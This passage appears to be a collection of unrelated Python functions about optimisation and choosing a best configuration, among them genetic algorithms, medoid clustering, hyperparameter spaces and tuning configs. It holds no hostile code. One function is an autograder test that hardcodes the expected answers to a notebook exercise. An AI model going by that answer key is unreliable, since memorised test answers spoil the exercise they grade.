that pass the qc parameters.\n highest_hotspot_count = 0\n most_frequent_hotspot = []\n for hotspot in hotspots:\n if hotspot['orig_stats']['qc']['final_qc_count'] > highest_hotspot_count:\n highest_hotspot_count = len(hotspot['ALT'])\n\n del most_frequent_hotspot[:]\n most_frequent_hotspot = []\n most_frequent_hotspot.append(hotspot)\n elif hotspot['orig_stats']['qc']['final_qc_count'] == highest_hotspot_count:\n most_frequent_hotspot.append(hotspot)\n\n best_hotspot = most_frequent_hotspot[0]\n return best_hotspot['CHROM'], best_hotspot['POS'], best_hotspot['REF'], \",\".join(best_hotspot['ALT'])", "def run(self):\n # Cache parameters and arrays\n nstat = self.north.shape[1]\n ind = self.istart\n solver = self.solver\n cutoff = self.cutoff\n shared = self.shared\n\n # Check if penalties are arrays\n arrflag = [isinstance(arr, np.ndarray) for arr in [self.penn,self.pene,self.penu]]\n arrflag = reduce(operator.mul, arrflag, 1)\n\n # Loop over my portion of GPS stations\n for jj in range(nstat):\n # Unpack component-wise indices of valid observations\n bool_east, bool_north, bool_up = self.bool_list[jj]\n # Extract valid observations\n dnorth, deast, dup = (self.north[bool_north,jj], \n self.east[bool_east,jj], \n self.up[bool_up,jj])\n wn, we, wu = (self.wn[bool_north,jj], \n self.we[bool_east,jj], \n self.wu[bool_up,jj])\n Gn, Ge, Gu = self.G[bool_north,:], self.G[bool_east,:], self.G[bool_up,:]\n # Perform estimation and store weights\n if arrflag:\n northPen, eastPen, upPen = self.penn[jj,:], self.pene[jj,:], self.penu[jj,:]\n else:\n northPen, eastPen, upPen = self.penn, self.pene, self.penu\n shared.m_north[:,ind], qn = solver.invert(dmultl(wn,Gn), wn*dnorth, northPen)\n shared.m_east[:,ind], qe = solver.invert(dmultl(we,Ge), we*deast, eastPen)\n shared.m_up[:,ind], qu = solver.invert(dmultl(wu,Gu), wu*dup, upPen)\n # Now modify the shared penalty array\n if arrflag:\n shared.penn[ind,:] = qn[cutoff:]\n shared.pene[ind,:] = qe[cutoff:]\n shared.penu[ind,:] = qu[cutoff:]\n ind += 1\n\n # done\n return", "def main(tuning_yamls_path):\n all_tuning_config_yaml = 'tuning_params_all.yaml'\n with open(os.path.join(tuning_yamls_path, all_tuning_config_yaml), 'r', encoding='utf-8') as file:\n all_config = yaml.safe_load(file)\n for path, _, yamls in os.walk(tuning_yamls_path):\n for yaml_file in yamls:\n if yaml_file == all_tuning_config_yaml:\n continue\n with open(os.path.join(path, yaml_file), 'r', encoding='utf-8') as file:\n yaml_config = yaml.safe_load(file)\n for 
index, value in enumerate(yaml_config['object']):\n for _, val in enumerate(all_config['object']):\n if val['name'] == value['name']:\n yaml_config['object'][index] = val\n break\n with open(os.path.join(path, yaml_file), 'w', encoding='utf-8') as file:\n file.write(yaml.dump(yaml_config, sort_keys=False))", "def set_config():\n available_configs = open('HousingPriceScraper/HousingPriceScraper/configs/input_url_config_descriptions.txt', 'r')\n options = available_configs.readlines()\n options_dict = {}\n print('available configs include:\\n')\n for option in enumerate(options):\n options_dict[option[0]] = option[1].split(':')[0]\n print('\\t{} - {}'.format(option[0], option[1].replace('\\n', '')))\n print('\\t{} - back'.format(len(options)))\n chosen = input('\\ncomma separate for multiple\\n').split(',')\n if (str(len(options)) in chosen) or (chosen == ['']):\n return True\n configs = []\n for choice in chosen:\n if int(choice) in options_dict:\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/{}.json'.format(options_dict[int(choice)])) as f:\n configs.append(json.load(f))\n final_config = defaultdict(list)\n for config in configs:\n for key, value in config.items():\n if key in final_config:\n final_config[key] += value\n else:\n final_config[key] = value\n for key, value in final_config.items():\n if any(isinstance(val, list) for val in value):\n final_config[key] = flatten_list_of_lists(value, make_set=True)\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json') as default_urls_json:\n default_dict = json.load(default_urls_json)\n for key, value in default_dict.items():\n if key not in final_config.keys():\n final_config[key] = value\n with open('HousingPriceScraper/HousingPriceScraper/configs/chosen_urls.json', 'w') as fp:\n json.dump(final_config, fp, sort_keys=True, indent=4)\n return True", "def run(self):\n print(' strategies...')\n matrix_file = ''\n matrix_s, matrix_c = None, None\n # run for all but the optimal version\n item2matrix = os.path.join(self.data_set.base_folder, 'item2matrix.txt')\n for rec_type in self.data_set.graphs:\n for graph in self.data_set.graphs[rec_type]:\n print(' ', graph)\n gt_graph = load_graph(graph)\n for strategy in Strategy.strategies:\n if strategy == 'optimal':\n continue\n print(' ', strategy)\n m_new = self.data_set.matrices[rec_type][graph][strategy][0]\n m_newc = self.data_set.matrices[rec_type][graph][strategy][1]\n debug(' ----', m_new)\n debug(' ----', m_newc)\n if not m_new:\n debug(' ---- not m_new')\n matrix_s, matrix_c, matrix_file = None, None, None\n elif matrix_file != m_new:\n matrix_s = SimilarityMatrix(item2matrix, m_new)\n matrix_c = SimilarityMatrix(item2matrix, m_newc)\n matrix_file = m_new\n debug(' ---- matrix_file != m_new')\n # for miss in self.data_set.missions[rec_type][graph][strategy]:\n for miss in Mission.missions:\n print(' ', miss)\n if 'Information Foraging' in miss or 'Berrypicking' in miss:\n matrix = matrix_c\n else:\n matrix = matrix_s\n for m in self.data_set.missions[rec_type][graph][strategy][miss]:\n for ti in xrange(len(m.targets_original)):\n start = m.path[-2] if m.path else m.start\n debug('++++' * 16, 'mission', ti, '/',\n len(m.targets_original))\n debug(m.targets_original[ti])\n self.navigate(gt_graph, strategy, m, start,\n None, matrix)\n if ti > 0 and len(m.targets_original[ti]) == len(m.targets[0]):\n # print('breaking...')\n m.reset()\n break\n if not (ti + 1) == len(m.targets_original):\n m.path.append(u'*')\n m.reset()\n\n # run the 
simulations for the optimal solution\n print(' optimal...')\n for rec_type in self.data_set.graphs:\n for graph in self.data_set.graphs[rec_type]:\n print(' ', graph)\n sp_file = graph.rsplit('.', 1)[0] + '.npy'\n with open(sp_file, 'rb') as infile:\n sp = pickle.load(infile)\n for miss in self.data_set.missions[rec_type][graph]['optimal']:\n for m in self.data_set.missions[rec_type][graph]['optimal'][miss]:\n for ti in xrange(len(m.targets_original)):\n start = m.path[-2] if m.path else m.start\n debug('++++' * 16, 'mission', ti, '/', len(m.targets_original))\n debug(m.targets_original[ti])\n self.optimal_path(m, start, sp)\n if not (ti + 1) == len(m.targets_original):\n m.path.append(u'*')\n m.reset()\n\n # # DEBUG\n # item2matrix = os.path.join(self.data_set.base_folder, 'item2matrix.txt')\n # for rec_type in ['rbar']:\n # for graph in self.data_set.graphs[rec_type]:\n # print(' ', graph)\n # gt_graph = load_graph(graph)\n # sp_file = graph.rsplit('.', 1)[0] + '.npy'\n # with open(sp_file, 'rb') as infile:\n # sp = pickle.load(infile)\n # m_newc = self.data_set.matrices[rec_type][graph]['title'][1]\n # matrix = SimilarityMatrix(item2matrix, m_newc)\n # sc = 'Berrypicking'\n # mc1 = self.data_set.missions[rec_type][graph]['title'][sc]\n # mc2 = self.data_set.missions[rec_type][graph]['optimal'][sc]\n # mc3 = self.data_set.missions[rec_type][graph]['random'][sc]\n # for m1, m2, m3 in zip(\n # mc1,\n # mc2,\n # mc3\n # ):\n # # evalute with title strategy\n # for ti in xrange(len(m1.targets_original)):\n # start = m1.path[-2] if m1.path else m1.start\n # debug('++++' * 16, 'mission', ti, '/', len(m1.targets_original))\n # # debug(m1.targets_original[ti])\n # self.navigate(gt_graph, 'title', m1, start, None, matrix)\n # # print(m1.path, ti, len(m1.targets_original[ti]), len(m1.targets[0]))\n # if ti > 0 and len(m1.targets_original[ti]) == len(m1.targets[0]):\n # # print('breaking...')\n # m1.reset()\n # break\n # if not (ti + 1) == len(m1.targets_original):\n # m1.path.append(u'*')\n # m1.reset()\n #\n # # evaluate with optimal strategy\n # for ti in xrange(len(m2.targets_original)):\n # start = m2.path[-2] if m2.path else m2.start\n # # debug('++++' * 16, 'mission', ti, '/', len(m2.targets_original))\n # # debug(m2.targets_original[ti])\n # self.optimal_path(m2, start, sp)\n # if not (ti + 1) == len(m2.targets_original):\n # m2.path.append(u'*')\n # m2.reset()\n # # pdb.set_trace()\n #\n # # if len(m1.path) < len(m2.path):\n # # print(len(m1.path), len(m2.path))\n # # pdb.set_trace()\n # # m1.compute_stats()\n # # m2.compute_stats()\n # # if m1.stats[-1] > m2.stats[-1]:\n # # print(m1.stats)\n # # print(m2.stats)\n # # pdb.set_trace()\n #\n # print('MISSION COLLECTION DONE')\n # mc1.compute_stats()\n # mc2.compute_stats()\n # print(mc1.stats[-1], mc2.stats[-1])\n # pdb.set_trace()\n\n # fname_5 = u'../data/bookcrossing/graphs/rbar_5.gt'\n # fname_20 = u'../data/bookcrossing/graphs/rbar_20.gt'\n # sp_file_5 = fname_5.rsplit('.', 1)[0] + '.npy'\n # sp_file_20 = fname_20.rsplit('.', 1)[0] + '.npy'\n # with open(sp_file_5, 'rb') as infile:\n # sp_5 = pickle.load(infile)\n # with open(sp_file_20, 'rb') as infile:\n # sp_20 = pickle.load(infile)\n # sc = 'Berrypicking'\n # mc_5 = self.data_set.missions['rbar'][fname_5]['optimal'][sc]\n # mc_52 = self.data_set.missions['rbar'][fname_5]['title'][sc]\n # mc_20 = self.data_set.missions['rbar'][fname_20]['optimal'][sc]\n # mc_202 = self.data_set.missions['rbar'][fname_20]['title'][sc]\n # for m5, m20, m52, m202 in zip(\n # mc_5,\n # mc_20,\n # 
mc_52,\n # mc_202\n # ):\n # # evaluate 5 with optimal strategy\n # for ti in xrange(len(m5.targets_original)):\n # start = m5.path[-2] if m5.path else m5.start\n # self.optimal_path(m5, start, sp_5)\n # if not (ti + 1) == len(m5.targets_original):\n # m5.path.append(u'*')\n # m5.reset()\n #\n # # evaluate 20 with optimal strategy\n # for ti in xrange(len(m20.targets_original)):\n # start = m20.path[-2] if m20.path else m20.start\n # self.optimal_path(m20, start, sp_20)\n # if not (ti + 1) == len(m20.targets_original):\n # m20.path.append(u'*')\n # m20.reset()\n #\n # # if len(m5.path) < len(m20.path) or \\\n # if m5.path.count('*') > m20.path.count('*'):\n # print(len(m5.path))\n # for part in ' '.join(m5.path[2:]).split('*'):\n # print(' ', part)\n # print(len(m20.path))\n # for part in ' '.join(m20.path[2:]).split('*'):\n # print(' ', part)\n # pdb.set_trace()\n #\n # print('MISSION COLLECTION DONE')\n # mc_5.compute_stats()\n # mc_20.compute_stats()\n # print(mc_5.stats[-1], mc_20.stats[-1])\n #\n # for m5, m20 in zip(mc_5.missions, mc_20.missions):\n # if m5.stats[-1] > m20.stats[-1]:\n # print(m5.stats)\n # print(m20.stats)\n # pdb.set_trace()\n # pdb.set_trace()\n\n # write the results to a file\n # self.write_paths()\n self.save()", "def _getNextParams(store):\n if isinstance(variables, list):\n if not hasattr(store, 'i'):\n store.i = 0\n if store.i == len(variables):\n return\n store.i += 1\n v = variables[store.i - 1]\n if not isinstance(v, dict):\n raise ValueError(\"Parameter was not dict? {}\".format(v))\n elif isinstance(variables, dict):\n if not hasattr(store, 'stack'):\n store.keys = list(variables.keys())\n store.stack = { name: 0 for name in store.keys }\n store.carry = 0\n\n if store.carry != 0:\n # All set, no more combinations to try\n return\n\n # Load up next set\n v = {}\n for name, vals in variables.items():\n v[name] = vals[store.stack[name]]\n\n # Increment and cascade\n store.carry = 1\n for k in store.keys:\n if store.carry == 0:\n break\n store.stack[k] += 1\n if store.stack[k] >= len(variables[k]):\n store.stack[k] = 0\n store.carry = 1\n else:\n store.carry = 0\n else:\n raise NotImplementedError(variables)\n\n if showProgress:\n sys.stderr.write(\"job_stream.baked: Starting {} of {} with {} \"\n \"trials\\n\".format(store.id, nExperiments-1,\n store.actualMin))\n\n # v is dict with parameters at the moment; give it an ID\n v = v.copy()\n v['id'] = store.id\n store.id += 1\n return (v, store.actualMin)", "def run(self):\n values_to_set = self._load().get_initial_values()\n\n best_data = []\n worst_data = []\n found = False\n overall_nb_generations_done = 0\n restart_counter = 0\n\n while overall_nb_generations_done < self._max_nb_generations and not found:\n new_population = ga_utils.create_generation(self._population_size, values_to_set)\n\n nb_generations_done = 0\n remember_the_best = 0\n nb_generations_without_improvement = 0\n\n # Loop until max allowed generations is reached or a solution is found\n while nb_generations_done < self._max_nb_generations and not found:\n # Rank the solutions\n ranked_population = ga_utils.rank_population(new_population)\n best_solution = ranked_population[0]\n best_score = best_solution.fitness()\n worst_score = ranked_population[-1].fitness()\n best_data.append(best_score)\n worst_data.append(worst_score)\n\n # Manage best value and improvements among new generations over time\n if remember_the_best == best_score:\n nb_generations_without_improvement += 1\n else:\n remember_the_best = best_score\n if 0 < 
self._restart_after_n_generations_without_improvement < nb_generations_without_improvement:\n print(\"No improvement since {} generations, restarting the program\".\n format(self._restart_after_n_generations_without_improvement))\n restart_counter += 1\n break\n\n # Check if problem is solved and print best and worst results\n if best_score > 0:\n print(\"Problem not solved on generation {} (restarted {} times). Best solution score is {} and \"\n \"worst is {}\".format(nb_generations_done, restart_counter, best_score, worst_score))\n # Not solved => select a new generation among this ranked population\n # Retain only the percentage specified by selection rate\n next_breeders = ga_utils.pick_from_population(ranked_population, self._selection_rate,\n self._random_selection_rate)\n\n children = ga_utils.create_children_random_parents(next_breeders, self._nb_children)\n new_population = ga_utils.mutate_population(children, self._mutation_rate)\n\n nb_generations_done += 1\n overall_nb_generations_done += 1\n else:\n print(\"Problem solved after {} generations ({} overall generations)!!! Solution found is:\".\n format(nb_generations_done, overall_nb_generations_done))\n best_solution.display()\n found = True\n print(\"It took {} to solve it\".format(tools.get_human_readable_time(self._start_time, time())))\n\n if not found:\n print(\"Problem not solved after {} generations. Printing best and worst results below\".\n format(overall_nb_generations_done))\n ranked_population = ga_utils.rank_population(new_population)\n best_solution = ranked_population[0]\n worst_solution = ranked_population[-1]\n print(\"Best is:\")\n best_solution.display()\n print(\"Worst is:\")\n worst_solution.display()\n\n graphics.draw_best_worst_fitness_scores(best_data, worst_data)", "def _advance_to_next_stage(self, config_ids, losses):\n rank = nondominated_sort(losses)\n indices = np.array(range(len(losses)))\n keep_indices = np.array([], dtype=int)\n\n # nondominance rank-based selection\n i = 0\n while len(keep_indices) + sum(rank == i) <= self.num_configs[self.stage]:\n keep_indices = np.append(keep_indices, indices[rank == i])\n i += 1\n keep_indices = np.append(keep_indices, indices[rank == i])\n\n # hypervolume contribution-based selection\n #ys_r = losses[rank == i]\n #indices_r = indices[rank == i]\n #worst_point = np.max(losses, axis=0)\n #reference_point = np.maximum(\n # np.maximum(\n # 1.1 * worst_point, # case: value > 0\n # 0.9 * worst_point # case: value < 0\n # ),\n # np.full(len(worst_point), eps) # case: value = 0\n #)\n\n #S = []\n #contributions = []\n #for j in range(len(ys_r)):\n # contributions.append(hypervolume([ys_r[j]]).compute(reference_point))\n #while len(keep_indices) + 1 <= self.num_configs[self.stage]:\n # hv_S = 0\n # if len(S) > 0:\n # hv_S = hypervolume(S).compute(reference_point)\n # index = np.argmax(contributions)\n # contributions[index] = -1e9 # mark as already selected\n # for j in range(len(contributions)):\n # if j == index:\n # continue\n # p_q = np.max([ys_r[index], ys_r[j]], axis=0)\n # contributions[j] = contributions[j] - (hypervolume(S + [p_q]).compute(reference_point) - hv_S)\n # S = S + [ys_r[index]]\n # keep_indices = np.append(keep_indices, indices_r[index])\n\n return_stat = np.zeros((len(losses))).astype(bool)\n return_stat[keep_indices] = True\n return return_stat\n\n # ranks = np.argsort(np.argsort(losses))\n # return (ranks < self.num_configs[self.stage])", "def race_configs(self, set_of_conf, incumbent, time_left):\n try:\n # Run all in parallel for list of 
instances\n if \"+LIST\" in self.parallel_options:\n pass\n # Run all in parallel for each instance\n elif \"+EACH\" in self.parallel_options:\n pass\n # Independent race against incumbent\n elif \"+INDP\" in self.parallel_options:\n pass\n else:\n ValueError(\"Wrong Combination Type\")\n\n # dummy solution\n best, inc_perf = self.intensifier.intensify(\n challengers=set_of_conf,\n incumbent=incumbent,\n run_history=self.runhistory,\n aggregate_func=self.aggregate_func,\n time_bound=max(self.intensifier._min_time, time_left)\n )\n return best, inc_perf\n except:\n return", "def get_n_best(self):\n pass", "def get_best_result(self) -> Optional[Tuple[int, Module, Dict[str, Dict[str, Tensor]], float, List[Dict]]]:\n if self._best_task_id is not None:\n compact_model = torch.load(Path(self._log_dir_root, 'best_result', 'model.pth'))\n compact_model_masks = torch.load(Path(self._log_dir_root, 'best_result', 'masks.pth'))\n with Path(self._log_dir_root, 'best_result', 'config_list.json').open('r') as f:\n config_list = json_tricks.load(f)\n return self._best_task_id, compact_model, compact_model_masks, self._best_score, config_list\n return None", "def minimize(self):\n self.normalize()\n p0s = self.spacedvals(method='random')\n if self.n_spots > 1:\n opts = self.multifit(p0s)\n else:\n opts = self.singlefit(p0s)\n self.yf = [self.solve(theta) for theta in opts]\n self.bestps = opts\n return opts", "def _auto_update_configuration(self) -> None:\n self.config = rasa.utils.train_utils.update_confidence_type(self.config)\n rasa.utils.train_utils.validate_configuration_settings(self.config)\n self.config = rasa.utils.train_utils.update_similarity_type(self.config)\n self.config = rasa.utils.train_utils.update_evaluation_parameters(self.config)", "def __optimize_configuration(self):\n index_neighbor = 0\n counter = 0\n while index_neighbor < self.__maxneighbor:\n # get random current medoid that is to be replaced\n current_medoid_index = self.__current[\n random.randint(0, self.__number_clusters - 1)\n ]\n current_medoid_cluster_index = self.__belong[current_medoid_index]\n\n # get new candidate to be medoid\n candidate_medoid_index = random.randint(\n 0, len(self.__pointer_data) - 1\n )\n\n while candidate_medoid_index in self.__current:\n candidate_medoid_index = random.randint(\n 0, len(self.__pointer_data) - 1\n )\n\n candidate_cost = 0.0\n for point_index in range(0, len(self.__pointer_data)):\n if point_index not in self.__current:\n # get non-medoid point and its medoid\n point_cluster_index = self.__belong[point_index]\n point_medoid_index = self.__current[point_cluster_index]\n\n # get other medoid that is nearest to the point (except current and candidate)\n other_medoid_index = self.__find_another_nearest_medoid(\n point_index, current_medoid_index\n )\n other_medoid_cluster_index = self.__belong[\n other_medoid_index\n ]\n\n # for optimization calculate all required distances\n # from the point to current medoid\n distance_current = euclidean_distance_square(\n self.__pointer_data[point_index],\n self.__pointer_data[current_medoid_index],\n )\n\n # from the point to candidate median\n distance_candidate = euclidean_distance_square(\n self.__pointer_data[point_index],\n self.__pointer_data[candidate_medoid_index],\n )\n\n # from the point to nearest (own) medoid\n distance_nearest = float(\"inf\")\n if (point_medoid_index != candidate_medoid_index) and (\n point_medoid_index != current_medoid_cluster_index\n ):\n distance_nearest = euclidean_distance_square(\n 
self.__pointer_data[point_index],\n self.__pointer_data[point_medoid_index],\n )\n\n # apply rules for cost calculation\n if point_cluster_index == current_medoid_cluster_index:\n # case 1:\n if distance_candidate >= distance_nearest:\n candidate_cost += (\n distance_nearest - distance_current\n )\n\n # case 2:\n else:\n candidate_cost += (\n distance_candidate - distance_current\n )\n\n elif point_cluster_index == other_medoid_cluster_index:\n # case 3 ('nearest medoid' is the representative object of that cluster and object is more\n # similar to 'nearest' than to 'candidate'):\n if distance_candidate > distance_nearest:\n pass\n\n # case 4:\n else:\n candidate_cost += (\n distance_candidate - distance_nearest\n )\n\n if candidate_cost < 0:\n counter += 1\n # set candidate that has won\n self.__current[\n current_medoid_cluster_index\n ] = candidate_medoid_index\n\n # recalculate clusters\n self.__update_clusters(self.__current)\n\n # reset iterations and starts investigation from the begining\n index_neighbor = 0\n\n else:\n\n index_neighbor += 1\n\n print(\"Medoid set changed {0} times\".format(counter))", "def get_station_configuration(station_id, station_configuration):\n \n si = station_id.decode('utf-8')\n \n if ':' in si:\n si = si.split(':')[1] , 'utf-8' \n station_id_secondary = '0-20000-0-' +si # remove the prefix to the station id \n else:\n for iid in b'0',b'1':\n \n station_id_primary = b'0-2000'+iid+b'-0-' +si # remove the prefix to the station id \n matching_primary_ind = np.where(station_configuration['primary_id'] == station_id_primary)[0]\n stat_conf_retrieved = station_configuration.loc[matching_primary_ind]\n if len(stat_conf_retrieved) > 0:\n return stat_conf_retrieved\n else:\n station_id_secondary=station_id_primary\n\n secondary = station_configuration['secondary_id'] \n loc=0\n for s in secondary:\n s = np.bytes_(str(s))\n try: \n if b'[' in s:\n st = s.replace(b'[',b'').replace(b']',b'')\n stl=st.split(b',')\n for st in stl:\n if si==st:\n #return loc # OLD wrong \n return station_configuration.loc[loc] # new version, might not work ???\n else:\n if si==s: \n return station_configuration.loc[loc] # new version, might not work ???\n except MemoryError:\n return 0\n loc=loc+1\n return 0", "def get_config_sample_speed():\n # try changing learning rate\n config = get_default_config()\n\n config['train_batch_size'] = 16384\n config['_policies'] = [None, \"from_scratch_sb\", \"pretrained\"]\n config['lr'] = 3e-4\n config['sgd_minibatch_size'] = 4096\n config['num_sgd_iter'] = 4\n config['rollout_fragment_length'] = 100\n config['num_workers'] = tune.grid_search([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n config['num_envs_per_worker'] = tune.grid_search([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n # ['humanoid_blocker', 'humanoid'],\n config['_train_policies'] = ['player_1']\n config['num_gpus'] = 0\n config['_train_steps'] = 20\n config[\"batch_mode\"] = \"complete_episodes\"\n\n config['_trainer'] = \"PPO\"\n config['_policy'] = \"PPO\"\n config['_call']['num_samples'] = 1\n config['_call']['resources_per_trial'] = {\n \"custom_resources\": {\"tune_cpu\": tune.sample_from(lambda spec: spec.config.num_workers + 10)}} # upper bound\n\n # config['_run_inline'] = True\n\n return config", "def generate_advantageous_configs(n_not_dealt, threshold):\n total = 0\n for _ in combinations_with_replacement(range(1, 11), n_not_dealt):\n total += 1\n total *= 100\n count = 0\n progress = min(10000, total / 10)\n print \"total configs \" + str(total)\n 
for not_dealt in combinations_with_replacement(range(1, 11), n_not_dealt):\n ua = 1\n for ub in range(1, 11):\n for ud in range(1, 11):\n shoe = {}\n for card in not_dealt:\n shoe[card] = shoe.get(card, 0) + 1\n shoe[ua] = shoe.get(ua, 0) + 1\n shoe[ub] = shoe.get(ub, 0) + 1\n shoe[ud] = shoe.get(ud, 0) + 1\n C = get_C_matrix(ua, ub, ud, shoe)\n if possible_advantage(C):\n nonzero_rows = C[np.any(C, axis=1)]\n nonzero = nonzero_rows[:,~np.all(nonzero_rows == 0, axis=0)]\n\n biased_S, biased_alpha, biased_D, biased_X, biased_Y = get_biased_hyperbit_sdp_discrete(\n nonzero)\n biased_obj = get_payout(nonzero, biased_S)\n\n classical_S, classical_p, classical_alpha, classical_beta = get_classical_discrete(\n nonzero)\n\n classical_obj = get_payout(nonzero, classical_S)\n\n if biased_obj - classical_obj > threshold:\n yield ua, ub, ud, not_dealt, biased_obj, classical_obj, biased_obj - classical_obj\n count += 1\n if count % progress == 0:\n print \"finished \" + str(count) + \" out of \" + str(total) + \" configurations \"", "def __optimize_configuration(self):\r\n index_neighbor = 0\r\n counter = 0\r\n while (index_neighbor < self.__maxneighbor):\r\n # get random current medoid that is to be replaced\r\n current_medoid_index = self.__current[random.randint(0, self.__number_clusters - 1)]\r\n current_medoid_cluster_index = self.__belong[current_medoid_index]\r\n\r\n # get new candidate to be medoid\r\n candidate_medoid_index = random.randint(0, len(self.__pointer_data) - 1)\r\n\r\n while candidate_medoid_index in self.__current:\r\n candidate_medoid_index = random.randint(0, len(self.__pointer_data) - 1)\r\n\r\n candidate_cost = 0.0\r\n for point_index in range(0, len(self.__pointer_data)):\r\n if point_index not in self.__current:\r\n # get non-medoid point and its medoid\r\n point_cluster_index = self.__belong[point_index]\r\n point_medoid_index = self.__current[point_cluster_index]\r\n\r\n # get other medoid that is nearest to the point (except current and candidate)\r\n other_medoid_index = self.__find_another_nearest_medoid(point_index, current_medoid_index)\r\n other_medoid_cluster_index = self.__belong[other_medoid_index]\r\n\r\n # for optimization calculate all required distances\r\n # from the point to current medoid\r\n distance_current = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[current_medoid_index])\r\n\r\n # from the point to candidate median\r\n distance_candidate = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[candidate_medoid_index])\r\n\r\n # from the point to nearest (own) medoid\r\n distance_nearest = float('inf')\r\n if ( (point_medoid_index != candidate_medoid_index) and (point_medoid_index != current_medoid_cluster_index) ):\r\n distance_nearest = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[point_medoid_index])\r\n\r\n # apply rules for cost calculation\r\n if (point_cluster_index == current_medoid_cluster_index):\r\n # case 1:\r\n if (distance_candidate >= distance_nearest):\r\n candidate_cost += distance_nearest - distance_current\r\n\r\n # case 2:\r\n else:\r\n candidate_cost += distance_candidate - distance_current\r\n\r\n elif (point_cluster_index == other_medoid_cluster_index):\r\n # case 3 ('nearest medoid' is the representative object of that cluster and object is more similar to 'nearest' than to 'candidate'):\r\n if (distance_candidate > distance_nearest):\r\n pass;\r\n\r\n # case 4:\r\n else:\r\n candidate_cost += distance_candidate - 
distance_nearest\r\n\r\n if (candidate_cost < 0):\r\n counter+=1\r\n # set candidate that has won\r\n self.__current[current_medoid_cluster_index] = candidate_medoid_index\r\n\r\n # recalculate clusters\r\n self.__update_clusters(self.__current)\r\n\r\n # reset iterations and starts investigation from the begining\r\n index_neighbor = 0\r\n\r\n else:\r\n\r\n index_neighbor += 1\r\n\r\n print(\"Medoid set changed {0} times\".format(counter))", "def get_configspace() -> CS.Configuration:\n cs = CS.ConfigurationSpace(seed=0)\n # START TODO ################\n lr_hp = CS.UniformFloatHyperparameter('lr', lower=1e-6, upper=1e-1, default_value=1e-2, log=True)\n optimizer_hp = CSH.CategoricalHyperparameter(name='optimizer', choices=['Adam', 'SGD', 'RMSprop'])\n sgd_momentum_hp = CS.UniformFloatHyperparameter('sgd_momentum', lower=0.00, upper=0.99, default_value=0.9)\n\n rms_momentum_hp = CS.UniformFloatHyperparameter('rms_momentum', lower=0.00, upper=0.99, default_value=0.9)\n rms_alpha_hp = CS.UniformFloatHyperparameter('rms_alpha', lower=0.00, upper=0.99, default_value=0.99)\n\n scheduler_hp = CSH.CategoricalHyperparameter(name='scheduler',\n choices=['CosineAnnealingLR', 'CosineAnnealingWarmRestarts'])\n cosine_max_t_hp = CS.UniformIntegerHyperparameter(name='cosine_max_t', lower=50, upper=300, default_value=150)\n cosine_warm_hp = CS.UniformIntegerHyperparameter(name='warm_t_0', lower=50, upper=300, default_value=150)\n\n sgd_cond = CS.EqualsCondition(sgd_momentum_hp, optimizer_hp, 'SGD')\n rms_cond1 = CS.EqualsCondition(rms_momentum_hp, optimizer_hp, 'RMSprop')\n rms_cond2 = CS.EqualsCondition(rms_alpha_hp, optimizer_hp, 'RMSprop')\n cosine_warm_cond = CS.EqualsCondition(cosine_warm_hp, scheduler_hp, 'CosineAnnealingWarmRestarts')\n cosine_cond = CS.EqualsCondition(cosine_max_t_hp, scheduler_hp, 'CosineAnnealingLR')\n cs.add_hyperparameters([lr_hp, optimizer_hp, sgd_momentum_hp, rms_momentum_hp,\n rms_alpha_hp, scheduler_hp, cosine_max_t_hp, cosine_warm_hp])\n cs.add_conditions([sgd_cond, rms_cond1, rms_cond2, cosine_cond, cosine_warm_cond])\n # END TODO ################\n return cs", "def _optimise(self):\n better = True\n self.solutions = set()\n\n # Rebuild the neighbours\n self.neighbours = {}\n\n for i in self.heuristic_path:\n self.neighbours[i] = []\n\n for j, dist in enumerate(TSP.edges[i]):\n if dist > 0 and j in self.heuristic_path:\n self.neighbours[i].append(j)\n\n # Restart the loop each time we find an improving candidate\n while better:\n better = self.improve()\n # Paths always begin at 0 so this should manage to find duplicate\n # solutions\n self.solutions.add(str(self.heuristic_path))\n\n self.save(self.heuristic_path, self.heuristic_cost)", "def test_lq_fit(self):\n # note: all prints here go to the output item in the json file\n\n # the best config and best score should have the right values\n best_config = self.notebook_locals[\"best_config\"]\n best_score = self.notebook_locals[\"best_score\"]\n self.assertFalse(best_config != 6, \"The chosen basis set is incorrect\")\n self.assertFalse(best_score != 63831, \"The best score is incorrect\")", "def run(self, no_improv_gen):\r\n bestvalue = min(self.cost_populations)\r\n no_improvement_tries = 0\r\n starttime = timeit.default_timer()\r\n\r\n while no_improvement_tries < no_improv_gen:\r\n endtime = timeit.default_timer()\r\n print(f\"Best value: {bestvalue}, no improvement tries: {no_improvement_tries}, time:{endtime - starttime}\")\r\n\r\n self.improve_population()\r\n self.sort_values()\r\n self.make_parents()\r\n 
self.parents_loop()\r\n \r\n # add best of the old population to the population\r\n while len(self.district_population) < self.population_size:\r\n index = self.best_costs.index(min(self.best_costs))\r\n self.cost_populations.append(self.best_costs[index])\r\n self.district_population.append(self.best_districts[index])\r\n del self.best_costs[index]\r\n del self.best_districts[index]\r\n\r\n if min(self.cost_populations) < bestvalue:\r\n bestvalue = min(self.cost_populations)\r\n no_improvement_tries = 0\r\n else:\r\n no_improvement_tries += 1\r\n \r\n self.best_districts = []\r\n self.best_costs = []\r\n self.worst_districts = []\r\n \r\n bestdistrict = self.cost_populations.index(bestvalue)\r\n return self.district_population[bestdistrict]", "def best_bat(self):\n\n i = 0\n j = 0\n for i in range(self.NP):\n if self.Fitness[i] < self.Fitness[j]:\n j = i\n for i in range(self.D):\n self.best[i] = self.Sol[j][i]\n self.f_min = self.Fitness[j]", "def find_best(template, config, key_seq, metric):\n possibles = get_deep(template, key_seq)\n if 1 == len(possibles):\n return None\n best_score = 2**60\n best_val = None\n for val in possibles:\n set_deep(config, key_seq, val)\n score = metric(config)\n #print \"FFFFFFFFF\", score\n if score < best_score:\n best_score = score\n best_val = val\n set_deep(config, key_seq, best_val)\n return best_score", "def initPopulation(self):\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: 